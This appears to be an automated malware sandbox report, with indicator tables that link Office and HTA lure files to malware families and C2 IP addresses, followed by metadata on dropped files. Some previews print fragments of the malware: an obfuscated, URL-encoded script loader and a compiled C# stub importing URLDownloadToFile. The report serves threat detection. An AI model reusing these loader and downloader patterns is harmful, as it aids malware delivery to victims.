AS-COLOCROSSINGUS | Logs.xls | malicious | Lokibot | 192.3.176.141
AS-COLOCROSSINGUS | PRODUCT_INQUIRY.js | malicious | WSHRat | 192.210.215.11
AS-COLOCROSSINGUS | Inv No.248740.xls | malicious | Unknown | 107.175.229.138
AS-COLOCROSSINGUS | InvoiceXCopy.xls | malicious | Snake Keylogger | 172.245.123.45
AS-COLOCROSSINGUS | seethebestthingstobegetmebackwithherlove.hta | malicious | Cobalt Strike | 23.94.171.157
AS-COLOCROSSINGUS | necgoodthingswithgreatthingsentirethingstobeinonline.hta | malicious | Cobalt Strike | 107.173.4.9
AS-COLOCROSSINGUS | nicworkgbeeterworkgoodthingswithgereatniceforme.hta | malicious | Cobalt Strike, Remcos, DBatLoader | 107.175.229.138
Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | #PO247762.docx | malicious | Remcos | 142.250.186.97, 216.58.212.174
05af1f5ca1b87cc9cc9b25185115607d | PO NAHK22012FA000000.docx | malicious | Unknown | 142.250.186.97, 216.58.212.174
05af1f5ca1b87cc9cc9b25185115607d | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 142.250.186.97, 216.58.212.174
05af1f5ca1b87cc9cc9b25185115607d | Logs.xls | malicious | Lokibot | 142.250.186.97, 216.58.212.174
05af1f5ca1b87cc9cc9b25185115607d | InvoiceXCopy.xls | malicious | Snake Keylogger | 142.250.186.97, 216.58.212.174
05af1f5ca1b87cc9cc9b25185115607d | CLOSURE.doc | malicious | Snake Keylogger, VIP Keylogger | 142.250.186.97, 216.58.212.174
05af1f5ca1b87cc9cc9b25185115607d | oodforme.doc | malicious | Remcos | 142.250.186.97, 216.58.212.174
05af1f5ca1b87cc9cc9b25185115607d | EX0096959.docx.doc | malicious | Remcos | 142.250.186.97, 216.58.212.174
05af1f5ca1b87cc9cc9b25185115607d | SGS-Report0201024.xla.xlsx | malicious | FormBook | 142.250.186.97, 216.58.212.174
05af1f5ca1b87cc9cc9b25185115607d | BA4M310209H14956.xls | malicious | Remcos | 142.250.186.97, 216.58.212.174
7dcce5b76c8b17472d024758970a406b | #PO247762.docx | malicious | Remcos | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | PO NAHK22012FA000000.docx | malicious | Unknown | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Logs.xls | malicious | Lokibot | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Inv No.248740.xls | malicious | Unknown | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | InvoiceXCopy.xls | malicious | Snake Keylogger | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | EX0096959.docx.doc | malicious | Remcos | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Inv No.248730.xls | malicious | Unknown | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Oct2024TU-580.xls | malicious | Unknown | 24.199.88.84
7dcce5b76c8b17472d024758970a406b | Inv No.248730.xls | malicious | Unknown | 24.199.88.84
                                                                                              No context
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):4742
                                                                                              Entropy (8bit):4.8105940880640246
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                              MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                              SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                              SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                              SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                              Malicious:false
                                                                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):0.34726597513537405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlll:Nll
                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                              Malicious:false
                                                                                              Preview:@...e...........................................................
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):133994
                                                                                              Entropy (8bit):2.149007711331083
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:Eam76DDqDh4t42wiBTPIsDkD6IN6Dx87T:Ea26DuDet4cPlDkD6m6DIT
                                                                                              MD5:6040C9C5025A690FC8A0965B17B7EEFF
                                                                                              SHA1:912C5740EB4187A719A6BE5891442C7EA83F9CF0
                                                                                              SHA-256:1F8934D51F9936ABA25181309C82EAB5EA4F3FDF263D727D17D021150A8A78CA
                                                                                              SHA-512:39917E620E9A4D408E104AF2B22601B25B78EE24478C39FDDB85D53D0F298BEA9757862DB17CD55BEA6814C0729CA7BF9DCF7CDC64E894E678D882D73831AAE9
                                                                                              Malicious:true
                                                                                              Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScRIPt%252520TYpE%25253D%252522tExT/VbsCrIPT%252522%25253E%25250AdIm%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):140578
                                                                                              Entropy (8bit):3.695250393374824
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:bybqHgt5pz6GwnGF5MogA+Z4Pcofy4jJBvs15tidfr4xvZU1uv/q:bybqgt5peGwFAPc8j/E154dfrcvZUaq
                                                                                              MD5:A662B24242684290B46777977F7FBFB7
                                                                                              SHA1:E4CB41E0206EEC554B60C131BA807C6DD0ADB3C1
                                                                                              SHA-256:BE2BF60EAE60DF6FC37A5BFC23BB5E8BAB48BA0664D990B545FD4BEA239AFA0F
                                                                                              SHA-512:27602CEFCC3D29DC8BC0886B2E6BB7CF7BDB75E3B1ED56AB1F1047D8E4D8F18EB4AFB04F9028A80642FA2C4F8DA62C178CDDA23C863C4D0CF5D7C6C50905185B
                                                                                              Malicious:false
                                                                                              Preview:
                                                                                              private function CreateSession(wsman, conStr, optDic, pingado)
                                                                                                  dim bombardeioFlags
                                                                                                  dim conOpt
                                                                                                  dim bombardeio
                                                                                                  dim authVal
                                                                                                  dim encodingVal
                                                                                                  dim encryptVal
                                                                                                  dim pw
                                                                                                  dim tout
                                                                                                  ' proxy information
                                                                                                  dim proxyAccessType
                                                                                                  dim proxyAccessTypeVal
                                                                                                  dim proxyAuthenticationMechanism
                                                                                                  dim proxyAuthenticationMechanismVal
                                                                                                  dim proxyUsername
                                                                                                  dim proxyPassword
                                                                                                  bombardeioFlags = 0
                                                                                                  proxyAccessType = 0
                                                                                                  proxyAccessTypeVal = 0
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):1462180
                                                                                              Entropy (8bit):4.432116325040296
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:rQelSzQ4mD3f5ReZdZJElOFmxi9DrvwdkfDxdYJhvRJiTeJ78KJcj/iiDmdYJhkG:rVlS5mzCJEuPukZBV
                                                                                              MD5:C88BBA4F839966D6648736A889FC1572
                                                                                              SHA1:6BC7FD238EB8563236B3E0049CFA9849DFC7A71B
                                                                                              SHA-256:49497513E15B13BD704C26CBE555D5F0A68F77203C59E500025BBC719366296D
                                                                                              SHA-512:0149FB22DD6E3530EEE015A978E4D99C6DBE6FE70C508C6CCFF735B875B0DE97B06BD9878C9E871A3EFBF2429640329A9CD80DE790CB80CB8364700333D5A571
                                                                                              Malicious:false
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):172076
                                                                                              Entropy (8bit):3.1342558498505824
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                                                                                              MD5:D85DAC1376E45C58F790BD50C2729F6C
                                                                                              SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                                                                                              SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                                                                                              SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                                                                                              Malicious:false
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):38272
                                                                                              Entropy (8bit):2.8081661079517968
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:6/CJoV9KjGhFi1lildmP/4GtXULs9h2QmlC+a6gz5nCf5OBgJP+SKA:6/CbiG1l34GtXl2QmlC+a6gz5SOyJ1/
                                                                                              MD5:1ED1E7A0ED6137C48652115CA579221E
                                                                                              SHA1:B66C7110A3831166B32E3664AAF24AB75C0CCCA1
                                                                                              SHA-256:A694409B40BB7B2DFC78BE6C7ECDFC4F6A8B95305247EB520C57F9E0B1BBFDC3
                                                                                              SHA-512:93D917CEAD84FF6792723B2238A342F995A3AF8DD0003DA8298BB04F5A6D53F0C6EC7728D6EE51933BEBA015969EAD8C25F8566E6DC2CEE4EBF931F2422F25AE
                                                                                              Malicious:false
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):349384
                                                                                              Entropy (8bit):3.7170605169628734
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:6dkVZD+Jb5qGYJ6OoG+RJ2dB9eJb85eKJBFgcxSoigiP/l5K:UkVZD+JbBYJhkRJiTeJI8KJcs/ibY
                                                                                              MD5:4491EFDD2921740B529E96BD780D0644
                                                                                              SHA1:A170615106A550A873E2FD78D913FA02264B1D19
                                                                                              SHA-256:2873A34503AFAFA73B48AB4C63CB00D14D209C24A704F6BBE92D5D9EA40BE538
                                                                                              SHA-512:FEFE0B18BD15EB774F42056EB9E39FD8BFF8DDEF76595E5EFEC9A76117D173513FFCFCF79A45ACDECD4F714DBC6E95EDB813AF610F19C96E1595D72DC7FDE707
                                                                                              Malicious:false
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):52712
                                                                                              Entropy (8bit):2.69601862257325
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:k37ZSy7s8wsI459Fwh+zRrXheOV8OV8OV1lJ//Te7rP:y7blMOV93WrP
                                                                                              MD5:57851611F066C7BD325A4B9817DD28B0
                                                                                              SHA1:A52AE733137921018D9670ABB919568CD5F90F2F
                                                                                              SHA-256:EE958A9DEF0CA8010229635A73E8F3621A234CAEE58EE7C6DF8CFE128490B139
                                                                                              SHA-512:A6B5D475F1247988B9139F2586D210FF0741203B398F7FB2CF8CB1C7C39250C52982954F81F576FF765E2561A3462078A173EA35749C1DDEF55FC99BD4918C85
                                                                                              Malicious:false
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:39:41 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.98449912131422
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HUe9EurZ0dHGjwKdNWI+ycuZhNsRakS1WPNnqSqd:hriFKd41ulsRa31qqSK
                                                                                              MD5:57B22B1B6E256D2C227D8B5931AB78E5
                                                                                              SHA1:7DE9637545FEB85CB798C902CA4B89E3E05577F4
                                                                                              SHA-256:6B71803C3BAB951289EF085F5B4B2659006A1A26EACC3211B4A73318D29CC344
                                                                                              SHA-512:14CCFB41D710AAB67894CC9F411BE196676C3C4C41F64C216B44C03DBB219D60ADC1D44955DE65B79FE4552FD36401BBD0E5101CF541699ED479333C4DCBC557
                                                                                              Malicious:false
                                                                                              Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP................1..9.=wV.MuJ.j.w..........4.......C:\Users\user\AppData\Local\Temp\RES955D.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.d.4.q.m.p.a.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:39:58 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.9920214704746377
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:Hg6e9Eur1aCEdH1wKdNWI+ycuZhNYakSUPNnqSqd:4rO2Kd41ulYa30qSK
                                                                                              MD5:4CD5D345060CC4203EEFE4759E988E8C
                                                                                              SHA1:FE0E77ECD78D4A73D7298E36A6879CA6BFB2BBD9
                                                                                              SHA-256:6C4A8676B0C9F258CB3210C9BCC1BA27595F2AE68B1EA3AE1165C270C516F46C
                                                                                              SHA-512:76C7E7B84270161848786F475BB3218556484FD771AC6C25BE4EB67C7F2FFC0D1CB1AF554390E68FEF03499A6FD38AF9524518372517DFBAE80589296B1CFD47
                                                                                              Malicious:false
                                                                                              Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP.................. .#8./.z..(.............4.......C:\Users\user\AppData\Local\Temp\RESD71D.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.a.n.s.5.0.4.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.0869623652509373
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWak7YnqqUPN5Dlq5J:+RI+ycuZhNYakSUPNnqX
                                                                                              MD5:98C0207F2338112F947AAEBA280EFDC6
                                                                                              SHA1:012F3F91D2AF85B64BC70330F1C42338123FB6EC
                                                                                              SHA-256:7441AC3E9423B7B72FF9CC8F820F4869560EA6B5CE5E55DC1D1416AAC64F93C1
                                                                                              SHA-512:6EA247C6DBA5AFA4A119792871F84E4967E4F57EE3B44AF3846E139A2B1B897607F866E17E5120998DDEFAEDFA68BB379CEFF22B21CC80532AC101ADA6757B8C
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.a.n.s.5.0.4.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.a.n.s.5.0.4.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (339)
                                                                                              Category:dropped
                                                                                              Size (bytes):448
                                                                                              Entropy (8bit):3.602368401674701
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:V/DsYLDS81zumcMGpJ/RQXReKJ8SRHy4HlQmVxNry:V/DTLDfuh8XfH/Ry
                                                                                              MD5:9C039B5963614D123333DA08E67495E2
                                                                                              SHA1:6B23C25A297DE997CBA7C4A34BBA17790F022004
                                                                                              SHA-256:B5BB2A1A865DFEEA658FD32146C6B8607AD2BA583FEEDB67D16E49BB0B323073
                                                                                              SHA-512:BD63BE7A8E58CBC0FCE553362B83A725B5F78108C7E5861BBD7AE9496AF71CC454CE220D1FE447EECAFF9B03EACF6A24B268C2660D47A6CFE372579EB03CB904
                                                                                              Malicious:false
                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace ZXa.{. public class bq. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr XtrbHs,string nlcr,string Gyvr,uint u,IntPtr A);.. }..}.
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):369
                                                                                              Entropy (8bit):5.229305465016943
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23ftp70zxs7+AEszIP23ftpV:p37Lvkmb6Kz1p70WZEo1pV
                                                                                              MD5:1E1AC3E3F12F98E466F35B2E557EF072
                                                                                              SHA1:D21B3D033E6EC7557CBC5272458CB633BB211676
                                                                                              SHA-256:AAFA87F4AA888AE60EF22211D94FC49502DC51912270D8DCF784F956FE332B26
                                                                                              SHA-512:9E18499DDD7013BE1D8CE7A43CB8535EE8DF40C4AB8126ABE0B6383A8F9FBAB61418E191812592E19E5BFA3614516C000485134BE3867ED429FFC2525531A4CA
                                                                                              Malicious:false
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mans504x\mans504x.0.cs"
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):3072
                                                                                              Entropy (8bit):2.7612254692225293
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:etGSTJ+Jyl8scigkVrVltzztkZfm9P0zCuWI+ycuZhNYakSUPNnqI:6EA+83VjuJm9P0OV1ulYa30qI
                                                                                              MD5:91B201D15FCC9CAF993FA30CADA9CE57
                                                                                              SHA1:3B6C4022D9BD12E4AC11A0E108474EDA97B08F96
                                                                                              SHA-256:C6FF7EF2D793C2A73A598ADC6DEAED3204847D593FE59942AF0C1EDA86B66A65
                                                                                              SHA-512:FAEFDEFFDC4DBC663FEAE900CCD912CD3524DC060DFDDFBCEEC6C4B7ECD16382CA07B8B6A1833A08806CCACC478A01F8CA9D43B5E8B8ECE5D91EF8ECA951D01A
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................D#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3..............................................................'.....b.....b.......................................... 5.....P ......G.........M.....T.....Y.....^.....`...G.....G...!.G.....G.......!.....*.......5..................................................<Module>.ma
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):866
                                                                                              Entropy (8bit):5.336000720421524
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:AId3ka6Kz1pVEo1SKaMD5DqBVKVrdFAMBJTH:Akka603VEokKdDcVKdBJj
                                                                                              MD5:F0F6A67D93D51EEB792EA3ED3B45D59C
                                                                                              SHA1:661D9B1869238AF44C914A1F5FD2E9F55E618500
                                                                                              SHA-256:CC388B285546D488FA39F67B213F2908CFB5776CB815388CA69F1A61B6373A1E
                                                                                              SHA-512:B1A98B09F0FED0EE27BD79837B108575E4B84D99F7D4F8DAC6A9808C3A28229193B7D26E79BD3F64C6C3EF8503ACF9BF9824041EC24A73C0489109251C82A393
                                                                                              Malicious:false
                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mans504x\mans504x.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.0957038359582962
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWRak7Ynqq1WPN5Dlq5J:+RI+ycuZhNsRakS1WPNnqX
                                                                                              MD5:312EB239E23D7756B34D754AD76AC277
                                                                                              SHA1:D377404B0F026E82CB1066758B75999F2F0959BE
                                                                                              SHA-256:745694638D3D96C9941B43794BCBD93421307D9E99F52009E43F2BF1AE50E49B
                                                                                              SHA-512:537A4413FE05852731A3C5C82B3B7D2F29662A2BDF252CC40048F2736436B11ECA4FDEFD8B6A9F8DADBAA28C0C9DF96CFA3011E7FECCBE597EAF9EE04876E510
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.d.4.q.m.p.a.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.d.4.q.m.p.a.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (339)
                                                                                              Category:dropped
                                                                                              Size (bytes):448
                                                                                              Entropy (8bit):3.602368401674701
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:V/DsYLDS81zumcMGpJ/RQXReKJ8SRHy4HlQmVxNry:V/DTLDfuh8XfH/Ry
                                                                                              MD5:9C039B5963614D123333DA08E67495E2
                                                                                              SHA1:6B23C25A297DE997CBA7C4A34BBA17790F022004
